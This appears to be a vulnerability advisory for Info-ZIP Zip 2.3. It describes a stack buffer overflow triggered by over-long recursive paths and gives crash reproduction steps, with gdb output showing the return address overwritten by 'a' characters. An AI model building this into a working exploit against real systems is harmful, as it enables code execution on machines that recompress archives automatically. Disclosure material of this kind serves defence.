Zip is a compression and file packaging/archive utility. Although highly compatible both with PKWARE's PKZIP and PKUNZIP utilities for MS-DOS and with Info-ZIP's own UnZip. Zip is installed by default with many Linux distributions.
A vulnerability in Zip allows a malicious attacker to run arbitrary code with a specially crafted zip file.
* Zip Version 2.3 which comes as "zip" package with Debian Linux. Possibly all earlier Info-Zip versions are vulnerable.
When zip performs recursive folder compression, it does not check for the length of resulting path. If the path is too long, a buffer overflow occurs leading to stack corruption and segmentation fault. It is possible to exploit this vulnerability by embedding a shellcode in directory or file name. While the issue is not of primary concern for regular users, it can be critical for environments where zip archives are re-compressed automatically using Info-Zip application.
The issue can be reproduced by following these steps:
1. Create an 8-level directory structure, where each directory name is 256 characters long (we used 256 'a' characters).
2. run "zip -r file.zip *". The application will crash with "segmentation fault"
3. run "gdb -core core `which zip`" (assuming core drop is enabled)
4. type "where" and hit Enter. Here is what you'll see:
Program terminated with signal 11, Segmentation fault.
#0 0x0805108e in error ()
#1 0x61616161 in ?? ()
#2 0x61616161 in ?? ()
#3 0x61616161 in ?? ()